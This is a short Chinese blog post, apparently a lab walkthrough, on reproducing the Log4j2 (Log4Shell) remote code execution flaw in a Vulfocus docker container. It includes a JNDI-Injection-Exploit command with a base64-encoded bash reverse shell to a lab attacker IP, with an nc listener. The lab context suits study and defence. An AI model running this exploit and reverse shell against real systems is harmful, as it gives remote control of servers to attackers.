靶场:

Vulfocus 靶场环境
目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。

漏洞复现:

我是本地复现:
环境:
*服务器地址:kali ip(192.168.30.132)(受害机)

docker pull vulfocus/log4j2-rce-2021-12-09:latest

docker run --name log4j -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

*攻击机子:Windows ip(192.168.30.134)

复现过程:

在攻击机上用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar开启ldap和rmi服务。在-C后插入PowerShell(适用于windows)。 由于服务器是linux,我使用的反弹shell,用nc监听,反弹到我的攻击机(vps)上。

可参考文章:JNDI-Injection-Exploit - 走看看

java -jar '.\JNDI-Injection-Exploit-1.0-SNAPSHOT-all .jar' -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEzNC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.30.134

如图,开启后使用EXP直接打,然后用NC监听,即可成功上线。

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐